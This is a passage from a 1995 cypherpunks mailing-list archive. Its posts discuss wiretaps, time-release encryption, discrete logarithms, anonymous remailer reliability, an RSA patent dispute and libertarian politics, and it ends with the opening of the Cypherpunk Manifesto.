have a significant, valid role in building consumer confidence in online
commerce.

Bill Machrone is vice president of technology for Ziff-Davis Publishing
Co. He can be reached at wmachrone (MCI Mail) or 72241,15 (CompuServe).
--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 13 Nov 1995 14:12:40 +0800
To: cypherpunks@toad.com
Subject: Re: ACLU Cyber-Liberties Update: Nov. 8, 1995
Message-ID: <199511130552.VAA16515@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>> > According to the government's own statistics, 1,800 innocent conversations
>> > are intercepted each and every time a wiretap or other form of electronic
>> > surveillance is placed.
>> This seems curiously inefficient, even for government work.

There was a discussion on the radio the other day that indicated that
some drug dealers really _are_ encoding data on their phones - though
Clipper won't help at all.  The author was talking about hanging out with
undercover drug agents while doing research on a book about the Mob or drug
dealers or whatever.  He and the cop were in a bar where a bunch of
high-level dealers were hanging out; many of them were on their cellphones
having conversations about "The 'patio furniture' you ordered is here.
We can get you the 'three tables' on Tuesday; would you like a couple of
'chairs' with them also?"  :-)  The dealers weren't bothered by the cops
being there; their lawyers were over at the next table in case they were needed.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 13 Nov 1995 14:34:23 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Who needs time vaults anyway?
Message-ID: <199511130613.WAA12515@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:15 PM 11/11/95 -0800, Simon Spero <ses@tipper.oit.unc.edu> wrote:
>As for real time-release - how about just using conventional encryption, 
>and require it to be brute-forced?  ..... Moore's law .....

Moore's law is really unpredictable - you can't be sure if the rate of
increase will go up or down, which could affect brute-force time by a
factor of 1000 pretty easily, especially if it suddenly becomes convenient
to do something your crypto-algorithm happens to use.

Also, there's a cost problem - a large brute-force project which requires
N years to crack either needs to be ferociously expensive, or else it's
easy for somebody to put a bunch of machines together to crack it faster.
For anything that requires that level of paranoia, Moore's law probably makes
the timing too unpredictable.

It probably makes a lot more sense to just do contractual solutions,
with secret-sharing protocols to minimize the effects of cheating,
bankrupt service providers, and accidents.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Mon, 13 Nov 1995 12:05:47 +0800
To: mark@lochard.com.au (Mark)
Subject: Re: Market Value of Web Pages
In-Reply-To: <199511130035.AA32505@junkers.lochard.com.au>
Message-ID: <199511130352.WAA02006@homeport.org>
MIME-Version: 1.0
Content-Type: text


	The point is that Microsoft Word doesn't have an 'encrypt'
button in the 'save' dialog.  This means that almost nothng gets
encrypted.  The NSA likes this, and keeps the ITARs around.

	(Someone might point out that this is why Colonel Bat Guano's
laptop had military secrets on it in plaintext when stolen out of his
car in the gulf war.)

Adam

Mark wrote:

| Off topic:
| Personally I dont see the relevance of ITAR and crypto any more. When was the
| last time any one was prosecuted under its statutes? What is the point of
| banning exportation of software which is widely available outside the US
| anyway? It's idiocy. Any foreign power or cartel wanting secure comms is not

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Mon, 13 Nov 1995 15:48:34 +0800
To: David A Wagner <daw@CS.Berkeley.EDU>
Subject: Re: Diffie-Hellman in GF(2^n)?
In-Reply-To: <199511122243.OAA18565@delhi.CS.Berkeley.EDU>
Message-ID: <Pine.SUN.3.91.951112224949.24714A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


> I don't know enough about number theory to judge for myself;
> but you can read the (long) paper yourself at
> 
> 	ftp://netlib.att.com/netlib/att/math/odlyzko/discrete.logs.ps.Z

Thanks for the reference.  The paper gives a running time of exp(c(n 
log n)^(1/2)) for discrete log in GF(p) and exp(c*n^(1/3)*(log n)^(2/3)) 
for discrete log in GF(2^n).  However, this paper was published in 1985. 
There is now an algorithm to calculate discrete logs in GF(p) in
exp(c*n^(1/3)*(log n)^(2/3)) (see prime.discrete.logs.ps.Z in the same
directory), so perhaps GF(2^n) isn't so bad after all. 

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Lewell <jrl@trel.demon.co.uk>
Date: Mon, 13 Nov 1995 19:12:09 +0800
To: cypherpunks@toad.com
Subject: Re: Who needs time vaults anyway?
Message-ID: <v01530500accc226554a7@[158.152.10.34]>
MIME-Version: 1.0
Content-Type: text/plain


Dan Oelke writes:
>Now, if we just had objects between 1 and 10 light years away
>that you could bounce lasers off of...... ;-)

There are plenty of objects out there. But isn't there some danger of
attracting the attention of high-spending aliens?

----------------------------------------------------------------------------
John Lewell...66a St John's Wood High Street  London NW8 7SH  United Kingdom
tel: +44 171 722 3098...fax: +44 171 483 1063....email: jrl@trel.demon.co.uk
Trel...The Commercial Internet Product Finder..<http://www.lpac.ac.uk/Trel/>







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 13 Nov 1995 23:41:34 +0800
To: cypherpunks@toad.com
Subject: Re: Market Value of Web Pages
In-Reply-To: <199511130435.UAA08914@jobe.shell.portal.com>
Message-ID: <199511130509.AAA00319@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



anonymous-remailer@shell.portal.com writes:
> As an example, I'm presently preparing an unsolicited Security Review
> report for a Fortune 500 company.  It's *priced* if you will in the mid
> five figure range per page (and that includes the title page, the
> appendices, and the pages which say on them, "this page left intentionally
> blank"). 

What a ripoff. I'm preparing a solicited security report for a Fortune
500 copy right now. I'm writing it at my usual rate -- which is
exhorbitantly high, but not so high that I'm charging them five
figures an hour to write the thing, and I can't imagine needing an
hour per page, including the title and other pages.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 13 Nov 1995 20:36:33 +0800
To: cypherpunks@toad.com
Subject: Re: coding and nnet's
Message-ID: <accc2f98010210047312@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:40 PM 11/11/95, Michael Pierson wrote:

>I wouldn't be surprised to learn of somebody like FinCEN using
>neural-net systems to do pattern analysis on funds transfers and
>the like, or the NRO or NSA investing research money into investigating
>the usefulness of NNs for image processing or for scanning raw ELINT,
>SIGINT or COMINT data.  In fact, I'd be quite surprised if they weren't.

These are well-known applications. The drug enforcement folks have programs
running at a place called the "El Paso Information Center" (EPIC), from
what I recall. Analyzing flights, passenger lists, etc., using various
AI/pattern recognition programs. (Some say the El Paso locale has tendrils
reaching to E Systems, Cray installations, etc., but I wouldn't know.)

I recall reading of some contracts let out, and other RFCs, for AI programs
for FinCEN use. Not surprising. (If I ran FinCEN, this is what I'd surely
have a bunch of folks working on. Scary thought.)

A bunch of AI-oriented job shops, such as Kestrel Institute and ADS, have
links to intelligence and law enforcement. Really too many possible
examples, and not surprising.

>While NNs may not be of direct relevance to cryptanalysis, I suspect
>they are, or will be, of great relevance to the task of identifying
>what communications should be cryptanalyzed or otherwise scrutinized.
>Especially given the high volume of traffic our 'thinkpol' aspire to
>be able to listen to.

Sure. Preprocessing of intercepts and signals, etc., is a natural application.

The point about neural nets not likely to be used in pure cryptanalysis was
a carefully limited point.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Mon, 13 Nov 1995 14:30:50 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: ACLU Cyber-Liberties Update: Nov. 8, 1995
In-Reply-To: <199511130552.VAA16515@ix2.ix.netcom.com>
Message-ID: <Pine.D-G.3.91.951113011903.19675C-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 12 Nov 1995, Bill Stewart wrote:

> >> > According to the government's own statistics, 1,800 innocent conversations
> >> > are intercepted each and every time a wiretap or other form of electronic
> >> > surveillance is placed.
> >> This seems curiously inefficient, even for government work.
> 
> There was a discussion on the radio the other day that indicated that
> some drug dealers really _are_ encoding data on their phones - though
> Clipper won't help at all.  The author was talking about hanging out with
> undercover drug agents while doing research on a book about the Mob or drug
> dealers or whatever.  He and the cop were in a bar where a bunch of
> high-level dealers were hanging out; many of them were on their cellphones
> having conversations about "The 'patio furniture' you ordered is here.
> We can get you the 'three tables' on Tuesday; would you like a couple of
> 'chairs' with them also?"  :-)  The dealers weren't bothered by the cops
> being there; their lawyers were over at the next table in case they were needed.

This kind of "coded" talk is frequent in drug cases and is generally easy 
to break -- and to prove what the words meant to the jury.  It can even 
have an unintended probative effect if the defense doesn't put on some 
evidence to support the "patio furniture," or whatever, story.


EBD

> #--
> #				Thanks;  Bill
> # Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
> # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281
> 
> 
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 14 Nov 1995 12:47:10 +0800
To: cypherpunks@toad.com
Subject: Re: DejaNews all over again
Message-ID: <199511131056.CAA06282@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 11 Nov 1995, Ray Cromwell wrote:

>> I think "Jeff" ... Mr. unofficial not speakng for the company Netscape
>> spokesperson, I think that you should rethink what you're suggesting. 
>> Your tactics won't serve your personal interests on this one.  I really
>> would recommend that you come clean.  This is not about "gloating".  I 
>> really take very little pleasure in this.
> 
>   Jeff, I think it's in your best interest to not waste your time
> responding to this moron (who bears many features in common with
> Detweiler)

I'm sure that most lawyers are probably advising Netscape's founders
to not respond -- just like Fuhrman, they should take the fifth
on this one. 

Hopefully everyone's D&O premiums are fully paid up ... 'cause to me this
smells like a failure to disclose a material event.  Netscape stock has
advanced almost 50% since the Bugs Bunny post. 

Some investors are gonna be mighty pissed.

Then again, what would I know ...



Alice de 'nonymous ...

                                  ...just another one of those...
                                                  ...hunters...

P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 13 Nov 1995 23:14:05 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199511131450.GAA15424@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp hash cut reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp. hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut ek";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(robo syrinx c2)
(flame hacktic replay)
(alumni portal)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
mix      mixmaster@remail.obscura.com     -----------   1:32:59  99.95%
ideath   remailer@ideath.goldenbear.com   -_.--------   5:58:20  99.94%
rmadillo remailer@armadillo.com           +++ ++++++++    39:25  99.92%
penet    anon@anon.penet.fi               ---+-------   6:09:10  99.86%
ecafe    cpunk@remail.ecafe.org           #*#*# #--*+*    38:11  99.86%
alumni   hal@alumni.caltech.edu           *+*--***+* *    13:43  99.63%
wmono    wmono@valhalla.phoenix.net       ****++-++* *    17:07  99.62%
replay   remailer@replay.com              **+**+*++* *    11:27  99.60%
vishnu   mixmaster@vishnu.alias.net       **-*+*+ **+*    14:30  99.38%
robo     robo@c2.org                      #*#*####** *     4:30  99.26%
hacktic  remailer@utopia.hacktic.nl       **+**+**** *    10:30  99.26%
spook    remailer@valhalla.phoenix.net    *****+-++* *    23:14  99.25%
flame    remailer@flame.alias.net         + +**++*** *    20:38  99.21%
portal   hfinney@shell.portal.com         #**--+#*   *    13:15  99.08%
bsu-cs   nowhere@bsu-cs.bsu.edu           *##++ ##** *     7:53  99.01%
c2       remail@c2.org                    *  -++++++      45:17  96.60%
ford     remailer@bi-node.zerberus.de     _ .    _ _-  53:08:59  93.60%
rahul    homer@rahul.net                  +-**----**+*    15:00  99.98%
extropia remail@extropia.wimsey.com            .--..-* 11:56:59  84.16%
syrinx   syrinx@c2.org                    --++++-+-  +  7:07:35  79.75%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 13 Nov 1995 14:27:39 +0800
To: cypherpunks@toad.com
Subject: Re: Gingrich, "crypto coalition" [*PURE* NOISE]
Message-ID: <199511130558.GAA12778@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


VZNuri:

>  but my main point in writing was that I thought I would highlight this 
>  phrase given to us by A.Nonymous: the "crypto coalition".
>  or it might be called the "computer coalition". I think I see a few
>  faint glimmerings of a new political movement, potentially.
>  the recent Washington Times editorial on the Exon pornography law,
>  encryption, and the superiority of allowing people to develop tools
>  to screen what they don't want to so, could be considered a
>  portrayal of some of the key philosophies.

      I see <A> the flames of a bunch of brats with a lot of disposable
income, and <B> a sysop culture armed with buckets of water they'd rather
not use lest it short out their technocratic "ethics."

>  its very interesting to contemplate that the online crowd could become
>  a more well-organized political coalition that has influence in politics.
>  its clear to me this is happening weakly and informally at the moment.
>  (i.e. people on the internet having similar philosophies, hence voting
>  with the same aims, although not organizing to do so yet).
>  a key ingredient I see working against this:

      Point-and-click organizing and killfile absorption of discourse. Harrumph.

>  the "coalition" has a lot of libertarian sentiments, and libertarians
>  tend to be anti-government and almost disdainful of even participating
>  in politics.

      In GROUP politics. Libertarianism is recursively structured: "when
there's no gubmint" -- I ain't holding my breath -- they won't trust
themselves.

>  one might differentiate between cybernauts who are interested in reforming
>  our government and using the Net as a tool to do so, such as Jim Warren, and
>  people at the opposite end of the spectrum of "participation" such as
>  TCM, who seem to advocate that political battles be simply rejected
>  or ignored as irrelevant to the future of "cryptoanarchy". (although recent 
>  noises of his I quoted were distinctly uncharacteristic.)

      To paraquote one of my favorite lesbians, a meme is a meme is a meme
is a meme is a meme. The idea that memes will change the world is very
typical of our era, which is to say very naive. Warren works, TCM plays;
Warren works, and TCM -- who, it's abundantly clear, is brilliant in his
own way -- gambles: gambles that the memes he's "trademarked" might pan
out.

>  if anyone is going to have influence in politics, it would be the former
>  type. but at least in the places in cyberspace where I hang out, I tend
>  to see more of the latter type: extremist libertarians who almost seem
>  to suggest that government is inherently unclean and dirty, no matter
>  what form it takes. I think these are the types that would hate a
>  government and advocate disenfranchisement with it no matter what 
>  direction it took, even if a libertarian was
>  elected to a powerful office. (its an interesting question to contemplate).

      Not really: libbies would rather play a low-stakes game with their
own back yard than a high-stakes game with society, in which everyone is
in each others' back yard.

>  it seems to me to be largely a philosophy of alienation bordering
>  on nihilism.

      Yes. 

>  now, I have been trashed in public for this position before, but the
>  philosophy of "us vs. them" applied to government in my opinion is the
>  wrong paradigm and only contributing to the problems, imho. an organized
>  "cyberspace coalition" could have tremendous political power to the point
>  that all the key annoying laws (such as the Itar etc.) actually become
>  election issues brought into mainstream consciousness. the editorials
>  I have seen about the Exon amendment etc. are steps in those directions.

      Trashed *as a tentacle*.
      Crypto as a litmus test isn't interesting: crypto is a means to an
end. What is that end? For too many, it is "antigovernment" -- that is,
reactionary.

>  I've seen TCM argue on this list against this, such that we should just
>  give up on telling congress what is important to us etc.  it was a position
>  that was not unanimous, and in fact quite controversial however, and 
>  remarkably PM once argued against it. (heh. love the fireworks on this list.
>  they are quite unpredictable at times).

      Perry has grime under his fingernails. Perry works, works with other
people toward definable ends: Perry is, among other things, a craftsman.
And if I'm not mistaken, he lives in a place where he gets to see how many
people live, and how they live together; this is very different from
*choosing to* live where and how TCM does. (Is this a "scurrilous attack,"
in TCM's words? Or is it just the expression of an opinion? Dr. Fred may
be an oaf, but the *reaction* to him demonstrates just how stupid it is to
say anything that doesn't toe the line on *this* list, despite all the
I-and-thou mumbojumbo.)

>  I'm all for replacing a dysfunctional government. but people here seem
>  to advocate that this happens automatically when one has certain 
>  technology.

      "Replacing" is a participle: what is the agent? If the agent is an
individual, or an alienated mass of individuals, it will not be able to
replace the govt; if, OTOH, it's a mass of ORGANIZED individuals, it is no
longer libertarian.

>  there is a whole other approach to "cryptoanarchy" that no one here
>  has ever suggested, but which could be tremendously effective: "infiltrate"
>  political positions with people sympathetic to that philosophy, and work
>  to change the entire structure toward it. "infiltrate" is a scary word,
>  but IMHO nothing any different than demopublicans appointing demopublicans
>  to office would be going on.

      This is crypto-anarchy, with "crypto-" meaning what it does to most
of the pople who use it: X passing as Y, a crypto-fascist for example. And
"infiltrate" is nothing more than a fancy word for working within the
system, namely, reformism.

>  a very interesting, key quote by someone here went to the effect: "if
>  TCM is right, nothing the government does matters. if TCM is wrong, 
>  nothing we do matters". a fascinating psychological justification for
>  a sort of nihilism. but at the root of it is a kind of laziness and
>  hostility to organization or groups in any form, IMHO.

      Yes: this hostility to organization is an old thread in American
culture. Its usually associated with antiurbanism, anticosmopolitanism,
things like that, but most libbies I've ever met (which is a lot) are
mnore anti-control than pro-freedom. You do the math.

>  in fact the libertarian extremists here seem not only to hate government,
>  they seem to hate the whole idea of groups accomplishing things, about
>  the idea of groups coming to consensus. this is a quite remarkably
>  cynical ideology.

      Cynical? How about naive?

>  I'm going to make a prediction: I think the people who are interested
>  in organizing the "cyberspace coalition" are starting to come together
>  right now, and that over the long run, this entity will be far more
>  beneficial in advancing a better reality through cyberspatial technology
>  than all the people who advocate disillusion, antagonism, resentment, 
>  and nonparticipation in groups and government, to the point the latter 
>  approach will be generally discredited. in other words, we have a powerful 
>  system that can be changed from the inside instead of abandoning it. at the 
>  moment, I've not seen any proof that a dedicated group couldn't reform
it from
>  the inside, only a lot of cynical conventional wisdom that such a thing
>  is inherently impossible and useless to try.

      If you haven't seen any proof that it can't be reformed, then you
haven't looked at the piechart on the back of the 1040 booklet.

>  the comment I quoted displays the conventional wisdom on this list, 
>  that the encryption issue is "us vs. them", "people vs. the government",
>  etc.  what would A.Nonymous say if someone who was elected began to 
>  embrace the position that encryption is a right? I'm sure he would find
>  some new reason to be disillusioned with government. that's the position
>  of radical libertarians. no matter what form government takes, no matter
>  who is driving it, they hate it. 

      "Encryption is a right" reveals that crypto-libbies are honkey-man
analogs of PC creeps: everything is a right.

>  the first lesson for radical libertarians bordering on anarchists 
>  that love this list is not that Oppressive Government is  the problem, but 
>  that Government Is Always Bogus. a rather infantile philosophy that reminds
>  me of the way children defy authority or structure merely because it
>  is an authority or a structure, not because of any particular disagreements
>  they have with the underlying philosophy it expresses. (or rather, they
>  manufacture the disagreement with the philosophy as required, such that
>  the reasoning is, if an authority stands for [x], then I am against [x], and
>  against that authority).

      Yes.

>  and this is precisely the dysfunctional
>  philosophy to life I am referring to that I think will be discredited in 
>  the long run as intellectually vacuous and actual counterproductive to
>  any kind of progress.

      Yes.

>  from what I have seen of Gingrich, he might be a potential leader of this
>  kind of "computer coalition". he is the congressman who has taken stands
>  on encryption issues and other key cyberspace issues that seem to suggest
>  an internal awareness of constitutional rights superseding momentarily-
>  politically-fashionable government legislative whims. of course I'm
>  putting on my flameproof longjohns as I say that.

      Don't bother putting anything on. He's a tool, a chump to his own
megalomania: I'd love to see that pussy get elected. The moment someone
sneezed, he'd set up a howl louder than a cat with a firecracker up its
butt. He's just as snively as anyone else these days.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 13 Nov 1995 20:32:35 +0800
To: cypherpunks@toad.com
Subject: Re: DejaNews all over again
In-Reply-To: <199511131056.CAA06282@jobe.shell.portal.com>
Message-ID: <199511131202.HAA01945@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



I, too, would advise NetScape to ignore this loon. Whether the person
behind it is "Dr." you-know-who or Detweiler or some third party loon
is immaterial. The fact of the matter is that although NetScape has
had security issues, the ones brought up by "Alice" are totally bogus.

.pm

anonymous-remailer@shell.portal.com writes:
> On Sat, 11 Nov 1995, Ray Cromwell wrote:
> 
> >> I think "Jeff" ... Mr. unofficial not speakng for the company Netscape
> >> spokesperson, I think that you should rethink what you're suggesting. 
> >> Your tactics won't serve your personal interests on this one.  I really
> >> would recommend that you come clean.  This is not about "gloating".  I 
> >> really take very little pleasure in this.
> > 
> >   Jeff, I think it's in your best interest to not waste your time
> > responding to this moron (who bears many features in common with
> > Detweiler)
> 
> I'm sure that most lawyers are probably advising Netscape's founders
> to not respond -- just like Fuhrman, they should take the fifth
> on this one. 
> 
> Hopefully everyone's D&O premiums are fully paid up ... 'cause to me this
> smells like a failure to disclose a material event.  Netscape stock has
> advanced almost 50% since the Bugs Bunny post. 
> 
> Some investors are gonna be mighty pissed.
> 
> Then again, what would I know ...
> 
> 
> 
> Alice de 'nonymous ...
> 
>                                   ...just another one of those...
>                                                   ...hunters...
> 
> P.S.  This post is in the public domain.
>                   C.  S.  U.  M.  O.  C.  L.  U.  N.  E.
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 13 Nov 1995 21:59:36 +0800
To: cypherpunks@toad.com
Subject: (fwd) Digital Signature Patent
Message-ID: <v02120d01acccf5f21b79@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


For those as get Info Week...

Cheers,
Bob Hettinga

--- begin forwarded text

Mime-Version: 1.0
Date: Mon, 13 Nov 1995 08:08:47 -0500
To: rah@shipwright.com
Subject: Digital Signature Patent

for your information...

-----------------------------------------------------------------------
RSA WANTS LICENSE FOR DIGITAL SIGNATURE TECHNOLOGY

RSA Data Security claims it owns the dominant patent covering
digital signature technology, and wants other companies and
government agencies to pay them license fees for using it.

The U.S. government is fighting RSA's claim, saying the digital
signature algorithm it uses in its digital signature standard
is covered by a different patent.  If RSA can make its claim
stick, the government will owe the encryption company royalties
for use of its digital signature standard.

source: Information Week
        13 Nov 95
        p20

via edupage

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 14 Nov 1995 07:19:47 +0800
To: cypherpunks@toad.com
Subject: what's going on
Message-ID: <199511130745.IAA15877@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Privacy is necessary for an open society in the electronic age.
Privacy is not secrecy.  A private matter is something one doesn't
want the whole world to know, but a secret matter is something one
doesn't want anybody to know. Privacy is the power to selectively
reveal oneself to the world.  

If two parties have some sort of dealings, then each has a memory of
their interaction.  Each party can speak about their own memory of
this; how could anyone prevent it?  One could pass laws against it,
but the freedom of speech, even more than privacy, is fundamental to
an open society; we seek not to restrict any speech at all.  If many
parties speak together in the same forum, each can speak to all the
others and aggregate together knowledge about individuals and other
parties.  The power of electronic communications has enabled such
group speech, and it will not go away merely because we might want it
to.

Since we desire privacy, we must ensure that each party to a
transaction have knowledge only of that which is directly necessary
for that transaction.  Since any information can be spoken of, we
must ensure that we reveal as little as possible.  In most cases
personal identity is not salient. When I purchase a magazine at a
store and hand cash to the clerk, there is no need to know who I am. 
When I ask my electronic mail provider to send and receive messages,
my provider need not know to whom I am speaking or what I am saying
or what others are saying to me;  my provider only need know how to
get the message there and how much I owe them in fees.  When my
identity is revealed by the underlying mechanism of the transaction,
I have no privacy.  I cannot here selectively reveal myself; I must
_always_ reveal myself.

Therefore, privacy in an open society requires anonymous transaction
systems.  Until now, cash has been the primary such system.  An
anonymous transaction system is not a secret transaction system.  An
anonymous system empowers individuals to reveal their identity when
desired and only when desired; this is the essence of privacy.

Privacy in an open society also requires cryptography.  If I say
something, I want it heard only by those for whom I intend it.  If 
the content of my speech is available to the world, I have no
privacy.  To encrypt is to indicate the desire for privacy, and to
encrypt with weak cryptography is to indicate not too much desire for
privacy.  Furthermore, to reveal one's identity with assurance when
the default is anonymity requires the cryptographic signature.

We cannot expect governments, corporations, or other large, faceless
organizations to grant us privacy out of their beneficence.  It is to
their advantage to speak of us, and  we should expect that they will
speak.  To try to prevent their speech is to fight against the
realities of information. Information does not just want to be free,
it longs to be free.  Information expands to fill the available
storage space.  Information is Rumor's younger, stronger cousin;
Information is fleeter of foot, has more eyes, knows more, and
understands less than Rumor.

We must defend our own privacy if we expect to have any.  We must
come together and create systems which allow anonymous transactions
to take place.  People have been defending their own privacy for
centuries with whispers, darkness, envelopes, closed doors, secret
handshakes, and couriers.  The technologies of the past did not allow
for strong privacy, but electronic technologies do.

We the Cypherpunks are dedicated to building anonymous systems.  We
